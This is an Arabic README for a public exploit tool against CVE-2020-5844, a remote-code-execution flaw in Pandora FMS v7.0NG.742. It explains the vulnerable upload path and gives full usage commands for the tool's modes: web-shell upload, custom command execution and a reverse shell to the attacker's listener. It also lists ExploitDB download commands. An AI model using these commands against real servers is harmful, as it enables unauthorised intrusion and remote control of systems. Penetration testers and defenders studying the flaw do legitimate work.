
استغلال ثغرة CVE-2020-5844 (Pandora FMS v7.0NG.742) - تنفيذ تعليمات برمجية عن بُعد

أعجبك هذا المستودع؟ امنحنا ⭐!
لأغراض التعليم والبحث الأمني المصرح به فقط.
@UNICORDev بواسطة (@NicPWNs و @Dev-Yeoj)
index.php?sec=godmode/extensions&sec2=extensions/files_repo في Pandora FMS v7.0 NG تسمح للمدراء المُصادَق عليهم برفع سكربتات PHP خبيثة وتنفيذها عبر فك ترميز base64 لموقع الملف. يؤثر هذا على v7.0NG.742_FIX_PERL2020.
استخدم هذا الاستغلال لتنفيذ الأوامر عن بُعد على الإصدارات المعرضة للخطر من Pandora FMS. يتطلب عنوان IP ومنفذًا للهدف. يتطلب اسم مستخدم/كلمة مرور صالحين أو مصادقة PHPSESSID صالحة. شغّل في الوضع الافتراضي لرفع قشرة ويب PHP أساسية. شغّل في وضع الأوامر المخصصة لتنفيذ أمر مخصص على الهدف. شغّل في وضع القشرة العكسية لاستقبال قشرة عكسية من الهدف على مستمع تقوم بإعداده. شغّل في وضع تخصيص قشرة الويب لتغيير اسم ملف قشرة الويب PHP.
python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -u <username> <password>
python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -p <PHPSESSID>
python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -p <PHPSESSID> [-c <custom-command>]
python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -p <PHPSESSID> [-s <local-ip> <local-port>]
python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -p <PHPSESSID> [-w <name.php>]
python3 exploit-CVE-2020-5844.py -h
-t Target host and port. Provide target IP address and port.
-u Target username and password. Provide username and password to log in to Pandora FMS.
-p Target valid PHP session ID. No username or password needed. (Optional)
-s Reverse shell mode. Provide local IP address and port. (Optional)
-c Custom command mode. Provide command to execute. (Optional)
-w Web shell custom mode. Provide custom PHP file name. (Optional)
-h Show this help menu.
تنزيل exploit-CVE-2020-5844.py من GitHub
تنزيل exploit-CVE-2020-5844.py من ExploitDB
searchsploit -u
searchsploit -m 50961
Pandora FMS v7.0NG.742




